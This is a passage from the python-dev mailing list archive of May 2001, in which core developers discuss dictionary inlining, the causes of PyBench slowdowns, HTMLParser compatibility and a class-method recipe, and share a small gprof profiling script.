object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Fri May 18 16:00:21 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benefit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake@acm.org  Fri May 18 16:12:34 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
 <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
 <20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benefit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido@digicool.com  Fri May 18 16:27:39 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
 <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
 <20010518170021.B16811@xs4all.nl>
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benefit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Fri May 18 16:36:39 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas@xs4all.net  Fri May 18 16:36:42 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benefit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@digicool.com  Fri May 18 16:49:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
 <004401c0dfb0$57b7df00$e46940d5@hagrid>
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
 <004401c0dfb0$57b7df00$e46940d5@hagrid>
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Fri May 18 17:57:34 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
 <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
 <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri May 18 18:37:33 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than using malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido@digicool.com  Fri May 18 18:43:45 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
 <20010518103733.A22185@glacier.fnational.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
 <20010518103733.A22185@glacier.fnational.com>
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri May 18 19:15:59 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (i.e.
it's O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

It's not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, an association table with
four entries would take on average two pointer compares to look
up a value.

  Neil


From mal@lemburg.com  Fri May 18 19:15:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 18 19:23:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
 <20010518111559.A22344@glacier.fnational.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
 <20010518111559.A22344@glacier.fnational.com>
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> It's not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, an association table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff@i2.com  Fri May 18 20:10:11 2001
From: James_Althoff@i2.com (James_Althoff@i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----

From:     James Althoff
Date:     05/14/01 02:09 PM
To:       python-list@python.org
cc:
Subject:  Re: Simulating Class (was Re: Does Python have Class methods)

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>, <meta6.Class1 instance at 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>, <meta6.Class2 instance at 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>


Jim


From tim.one@home.com  Fri May 18 20:26:02 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!
From the instant you created it, PyBench became the best performance canary
we have ("canary" in the sense of bringing a bird into the coal mine with
you, because when a potentially fatal buildup of gasses occurs, the canary
will pass out before you even notice).

My point was that making a decision based solely on that PyBench happens to
create millions of dicts of exactly size 3, and relatively few of any other
size, would be crazy -- which I'm sure you understand and appreciate too.

> ...
> I found that instance dictionaries are usually within the 8 slot
> range. You normally have a few heavyweight instances and
> many lightweight ones which only have two or three attributes
> in their instance dict.

Matches my observations too.

[on dict resize parameters]
> Why not make those parameters macros at the top of dictobject.c
> which can then be tuned to whatever the programmer needs/wants ?!

Bad idea, IMO.  If someone understands the dict implementation well enough to
be *competent* to change these without, e.g., opening a door to infinite
loops, then they already know where these parameters appear, and can change
the hardcoded #s themselves.  The max load factor simply wasn't intended to
be adjustable; and if it were, it would be a per-dict decision.


From tim.one@home.com  Fri May 18 20:48:33 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.
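Tim's shift-and-xor step works because shifting left and reducing by a primitive polynomial multiplies the index by x in GF(2^k), which cycles through every nonzero slot before repeating. The sketch below models only that step as Tim describes it, assuming an 8-slot table (mask 7) and the polynomial x**3 + x + 1 (0b1011); `probe_sequence` is a hypothetical name, and the actual lookup loop in dictobject.c may apply the step differently.

```python
def probe_sequence(start, mask, poly):
    """Yield slot indices from `start`, stepping by shift-and-xor.

    `start` must be nonzero (0 maps to itself under this step), and
    `poly` is assumed primitive so the cycle closes back at `start`.
    """
    i = start
    while True:
        yield i
        i <<= 1            # multiply by x
        if i > mask:
            i ^= poly      # reduce modulo the polynomial; clears the high bit
        if i == start:
            return         # every nonzero slot has been visited once


if __name__ == "__main__":
    # 8-slot table: mask = 7, poly = x**3 + x + 1 = 0b1011 (assumed)
    print(list(probe_sequence(1, 7, 0b1011)))  # [1, 2, 4, 3, 6, 7, 5]
```

Compared with "++i", each step costs a shift, a compare and sometimes an xor, which is Tim's point: the extra work only matters when the first probe misses.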

> It's not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, an association
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).
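Tim's figures for a four-entry association table can be checked with a small model of Neil's linear scan. This is a sketch under the assumption that each key test (identity first, as for interned strings, then equality) counts as one compare; `assoc_lookup` is a hypothetical name.

```python
from fractions import Fraction


def assoc_lookup(table, key):
    """Linear scan over (key, value) pairs; return (value, compares)."""
    compares = 0
    for k, v in table:
        compares += 1
        # Pointer compare first (cheap for interned strings), then equality.
        if k is key or k == key:
            return v, compares
    return None, compares  # key absent: every entry was examined


if __name__ == "__main__":
    keys = ["a", "b", "c", "d"]
    table = [(k, i) for i, k in enumerate(keys)]
    present = [assoc_lookup(table, k)[1] for k in keys]
    print(Fraction(sum(present), len(present)))  # 5/2
    print(assoc_lookup(table, "zz")[1])          # 4
```

Each of the four keys costs 1, 2, 3 or 4 compares, so the average over equally likely present keys is 10/4 = 2.5, and a missing key always scans all 4 entries.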


From jeremy@alum.mit.edu  Fri May 18 22:07:37 2001
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctionCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and what their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This test spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido@digicool.com  Fri May 18 22:58:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
 <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This tests spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@digicool.com  Fri May 18 23:06:05 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
 <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):

       LDFLAGS="-pg" OPT="-pg" configure
       make

   When you run python it produces a gmon.out file.  To run gprof, pass
   it the profile-enabled executable and gmon.out.  It'll spit out the
   results on stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile(r'class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])
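The `grep` pipeline in `find_bench` can also be done in-process. This is a Python 3 sketch, not part of the original script. It assumes the benchmark modules are the `*.py` files in one directory, and unlike `grep` it treats `name` as a plain substring rather than a regular expression. Files are scanned in sorted order, which only approximates the shell's glob order.

```python
import glob
import os
import re

# Same pattern as rx_decl above: a class statement with one base class.
RX_DECL = re.compile(r'class (\w+)\(\w+\):')


def find_bench(name, directory="."):
    """Return (filename, classname) for the first class statement in a
    *.py file under `directory` on a line mentioning `name`,
    or (None, None) if there is none."""
    for path in sorted(glob.glob(os.path.join(directory, "*.py"))):
        with open(path) as f:
            for line in f:
                if name not in line:
                    continue  # the grep step: keep only lines mentioning name
                mo = RX_DECL.search(line)
                if mo is not None:
                    return os.path.basename(path), mo.group(1)
    return None, None
```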


From jim@interet.com  Sat May 19 17:45:15 2001
From: jim@interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Somerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido@digicool.com  Sun May 20 00:18:25 2001
From: guido@digicool.com (Guido van Rossum)
